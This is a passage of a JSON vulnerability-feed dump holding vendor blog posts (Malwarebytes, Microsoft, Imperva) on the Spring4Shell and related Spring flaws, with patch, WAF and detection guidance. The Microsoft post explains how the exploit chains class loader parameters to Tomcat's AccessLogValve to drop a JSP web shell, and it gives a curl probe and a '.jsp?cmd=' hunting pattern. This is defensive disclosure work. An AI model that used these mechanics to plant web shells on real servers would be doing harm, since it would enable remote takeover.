apart.\n\nBut when security experts themselves start to confuse different vulnerabilities in the same framework and researchers disclose details about an unpatched vulnerability because they think the information is out anyway, serious problems can arise.\n\nIn March, two RCE vulnerabilities were being discussed on the internet. Most of the people talking about them believed they were talking about "Spring4Shell" ([CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>)), but in reality they were discussing [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>). To add to the stress, a Chinese researcher prematurely spilled details about the vulnerability before the developer of the vulnerable Spring Framework could come up with a patch. This may have been due to the confusion about the two vulnerabilities.\n\nIn the end, Spring4Shell fizzled, working only for certain configurations and not for an out-of-the-box install.\n\n## Public service or not?\n\nSo, are we doing the public a service by writing about vulnerabilities? We feel we are, because it is good to raise awareness about the existence of vulnerabilities. But, to be effective, we need to meet certain criteria.\n\n * First of all, it needs to be made clear who is affected and who needs to do something about it. And what you can do to protect yourself.\n * While it is not always easy to make an assessment about the threat level, since we often don't have the exact details of a vulnerability, it is desirable to not exaggerate the impact.\n * Make it very clear whether or not a threat is being used in the wild if you have that information.\n\nIn a recent assessment, security researcher [Amelie Koran](<https://infosec.exchange/@webjedi>) said on Mastodon that the economic costs of Heartbleed were mostly due to vulnerability assessment and patching and not necessarily lost or stolen data. Not that it wouldn't have backfired if the patch hadn't been deployed, but it is something to keep in mind. A panic situation can do more harm than the actual threat.\n\n* * *\n\n**We don't just report on threats--we remove them**\n\nCybersecurity risks should never spread beyond a headline. Keep threats off your devices by [downloading Malwarebytes today](<https://www.malwarebytes.com/for-home>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-19T01:00:00", "type": "malwarebytes", "title": "4 over-hyped security vulnerabilities of 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965", "CVE-2022-27492", "CVE-2022-34718", "CVE-2022-36934"], "modified": "2022-12-19T01:00:00", "id": "MALWAREBYTES:30F9B0094E0BC177A7D657BF67D87E39", "href": "https://www.malwarebytes.com/blog/news/2022/12/4-times-security-vulnerabilities-were-blown-out-of-proportion-in-2022", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2022-04-11T23:40:15", "description": "**_April 11, 2022 update_** \u2013 __Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See [](<https://www.microsoft.com/security/blog/wp-admin/post.php?post=110715&action=edit#detectandprotect>)Detect and protect with Azure Web Application Firewall (Azure WAF) section for details__.\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. This blog is for customers looking for protection against exploitation and ways to detect vulnerable installations on their network of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell).\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve _object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server running the Spring Core framework. Other vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, any system within the scope of impacted systems listed above should still be considered vulnerable.\n\nThe [](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)[threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n * Background\n * Request mapping and request parameter binding\n * The process of property binding\n * The vulnerability and its exploitation\n * Prelude: CVE-2010-1622\n * The current exploit: CVE-2022-22965\n * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n * How to find vulnerable devices\n * Enhanced protection with Azure Firewall Premium\n * Detect and protect with Azure Web Application Firewall (Azure WAF)\n * Global WAF with Azure Front Door\n * Regional WAF with Azure Application Gateway\n * Patch information and workarounds\n 5. Detections\n * Microsoft 365 Defender\n * Endpoint detection and response (EDR)\n * Antivirus\n * Hunting\n * Microsoft 365 Defender advanced hunting queries \n * Microsoft Sentinel\n\n## Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC is specific to Tomcat server's logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ class using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then change the default access logs to a file of their choosing.\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessValveLog_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes a Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\n Figure 2. Screenshot from the original POC code post Figure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client's ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed for that manipulation of the access log to be placed in an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path inside the Tomcat's web application ROOT directory, which essentially drops a reverse shell inside Tomcat. For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application's developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public string handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. So, if, for instance, _Location_ will be defined as:\n \n \n class Location \n { \n public void setCountry(string country) {\u2026} \n public void setCity(string city) {\u2026} \n public string getCountry() {\u2026} \n public string getCity() {\u2026} \n }\n\nIf we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nThe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try and initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&coordinate.latitude=456_ Spring would try and set those values in the _coordinates_ member of _location_, before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try and bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If location has a getX_()_ accessor, call it to get the _x_ member of location\n 3. Use Java introspection to map all accessors and mutators in the_ x_ object\n 4. If the _x_ object has a _getY_() accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the_ y_ object\n 6. If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object's class.\n 2. _Class_ objects have a _getClassLoader()_ accessor the gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring mapped the _getClassLoader()_ accessor of the _Module_ object. Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve _is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory: **The path where to store the access log, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by http requests, such as the web application\u2019s directory.\n 2. **Prefix: **The prefix of the access log file name\n 3. **Suffix: **The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern: **A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server as Tomcat.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. \n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and include vulnerability protection for SpringShell since March 31, 2022. The screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to versions 5.3.18 or later or 5.2.19 or later. If the patch is applied, no other mitigation is necessary.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search the @InitBinder annotation globally in the application to see if the dataBinder.setDisallowedFields method is called in the method body. If the introduction of this code snippet is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** If this code snippet is used a lot, it needs to be appended in each location.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice{\n @InitBinder\n public void setAllowedFields(webdataBinder dataBinder){\n String[]abd=new string[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alerts for an observed attack, but might not be unique to exploitation for this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### Microsoft 365 Defender advanced hunting queries \n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers HTTP use of the exploitation and not HTTPS.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempt (CVE-2022-22965) to drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2202-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts _table includes only the device name of the affected device. This query joins the _DeviceInfo _table to clearly connect other information such as device group, IP address, signed in users, and others. This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 _Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See _Detection and Mitigation section for details_.\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now has enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See Detection and Mitigation section for details. \n[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mmpc", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MMPC:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2022-03-31T18:03:34", "description": "New zero-day Remote Code Execution (RCE) vulnerabilities were discovered in Spring Framework, an application development framework and inversion of control container for the Java platform. The vulnerability potentially leaves millions of applications at risk of compromise. In two separate disclosures, [zero-day](<https://www.imperva.com/learn/application-security/zero-day-exploit/>) RCE vulnerabilities were revealed in the Cloud and Core modules of Spring Framework.\n\nSpring Framework \u201cprovides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform\u201d [[1](<https://spring.io/projects/spring-framework>)]. Java is one of the most commonly used development languages, and Spring is commonly cited as one of the most popular Java frameworks.\n\nThe first of the disclosures [dropped](<https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html>) on March 26, and reported on a vulnerability in the Spring Framework Cloud module, which allowed for the injection of a SPeL expression into a header value. This crafted header value would then be evaluated by the server and could result in a RCE. The vulnerability was assigned [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>).\n\nThe second of these disclosures was released on March 29 on Twitter by a researcher, in a since-deleted Tweet, containing a screenshot of the exploit request. Since then, the exploit was tweeted by others and published to GitHub, but again, was quickly removed. The vulnerability, called Spring Framework RCE via Data Binding on JDK 9+, comes in the form of a Java class injection flaw in Spring Core, where the JDK version is >=9.0. If exploited, an attacker can leverage this vulnerability to perform a RCE on the server. This vulnerability was assigned [CVE-2022-22965](<https://tanzu.vmware.com/security/CVE-2022-22965>).\n\nSince the disclosures, Imperva Threat Research monitored widespread attempted exploitations of _both_ new zero-day vulnerabilities (~5.5 million and counting as of March 31).\n\n## Imperva Delivers Protection from CVE-2022-22963\n\nImperva Threat Research analysts downloaded and quickly tested the exploit, verifying that both vulnerabilities are blocked out of the box by [Imperva Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and Imperva WAF Gateway.\n\nGiven the nature of how [Imperva Runtime Protection (RASP)](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) works, RCEs caused by CVE-2022-22963 and Spring4Shell are stopped without requiring any code changes or policy updates. If Imperva RASP is currently deployed, applications of all kinds (active, legacy, third-party, APIs, etc.) are protected.\n\nTogether, Imperva WAF and Imperva RASP provide defense-in-depth for protecting applications and APIs. Both are industry-leading products that are designed to protect against zero day threats and the OWASP Top 10 application security threats, injections and weaknesses. If you\u2019re looking for protection from CVE-2022-22963, please contact us.\n\n**Q: How can I verify that Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) is being blocked?**\n\n**A:** For CWAF customers, Imperva provides attack analytics, which shows customers any attempts to exploit CVE-2022-22963. In addition, existing rules for older vulnerabilities including CVE-2015-1427 protect against CVE-2022-22965.\n\nFor WAF Gateway customers, Imperva has signatures for older vulnerabilities, including CVE-2010-1871, CVE-2018-1260, and CVE-2015-1427 that protect against CVE-2022-22963 and CVE-2022-22965\n\nImperva is also in the process of pushing more specific rules that will have a clear name associated with CVE-2022-22963 and CVE-2022-22965.\n\nThe post [Imperva Protects from New Spring Framework Zero-Day Vulnerabilities](<https://www.imperva.com/blog/imperva-protects-from-new-spring-framework-zero-day-vulnerabilities/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:20:03", "type": "impervablog", "title": "Imperva Protects from New Spring Framework Zero-Day Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2015-1427", "CVE-2018-1260", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T15:20:03", "id": "IMPERVABLOG:45FA8B88D226614CA46C4FD925A08C8B", "href": "https://www.imperva.com/blog/imperva-protects-from-new-spring-framework-zero-day-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2022-04-11T23:40:23", "description": "**_April 11, 2022 update_** \u2013 __Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See [](<https://www.microsoft.com/security/blog/wp-admin/post.php?post=110715&action=edit#detectandprotect>)Detect and protect with Azure Web Application Firewall (Azure WAF) section for details__.\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. This blog is for customers looking for protection against exploitation and ways to detect vulnerable installations on their network of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell).\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve _object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server running the Spring Core framework. Other 